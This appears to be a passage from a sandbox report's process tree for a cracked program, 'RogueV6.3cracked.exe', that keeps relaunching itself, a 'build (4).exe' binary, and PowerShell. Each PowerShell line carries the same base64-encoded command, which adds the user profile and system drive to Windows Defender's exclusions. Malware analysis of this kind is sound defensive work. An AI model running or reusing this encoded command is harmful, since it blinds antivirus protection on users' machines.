C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"64⤵PID:7832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="65⤵PID:7228
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"65⤵PID:6604
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"65⤵PID:7452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="66⤵PID:7908
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"66⤵PID:6544
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"66⤵PID:6272
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="67⤵PID:6564
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"67⤵PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"67⤵PID:6196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="68⤵PID:7256
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"68⤵PID:6132
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"68⤵PID:7912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="69⤵PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"69⤵PID:6804
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"69⤵PID:7440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="70⤵PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"70⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"70⤵PID:3484
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="71⤵PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"71⤵PID:6752
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"71⤵PID:840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="72⤵PID:8144
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"72⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"72⤵PID:7836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="73⤵PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"73⤵PID:4384
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"73⤵PID:3556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="74⤵PID:7852
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"74⤵PID:7876
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"74⤵PID:1384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="75⤵PID:7904
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"75⤵PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"75⤵PID:2844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="76⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"76⤵PID:7940
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"76⤵PID:7548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="77⤵PID:8008
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"77⤵PID:7836
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"77⤵PID:5592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="78⤵PID:4656
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"78⤵PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"78⤵PID:3956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="79⤵PID:7288
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"79⤵PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"79⤵PID:1384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="80⤵PID:4348
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"80⤵PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"80⤵PID:5052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="81⤵PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"81⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"81⤵PID:2108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="82⤵PID:2732
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"82⤵PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"82⤵PID:1028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="83⤵PID:6872
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"83⤵PID:5448
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"83⤵PID:6280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="84⤵PID:4692
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"84⤵PID:5404
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"84⤵PID:4904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="85⤵PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"85⤵PID:7548
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"85⤵PID:5704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="86⤵PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"86⤵PID:856
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"86⤵PID:5476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="87⤵PID:8344
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"87⤵PID:8360
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"87⤵PID:8380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="88⤵PID:8692
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"88⤵PID:8728
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"88⤵PID:8764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="89⤵PID:8900
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"89⤵PID:8908
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"89⤵PID:8952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="90⤵PID:9148
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"90⤵PID:9176
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"90⤵PID:7028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="91⤵PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"91⤵PID:8460
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"91⤵PID:8464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="92⤵PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"92⤵PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"92⤵PID:7320
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="93⤵PID:8784
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"93⤵PID:7664
-
-
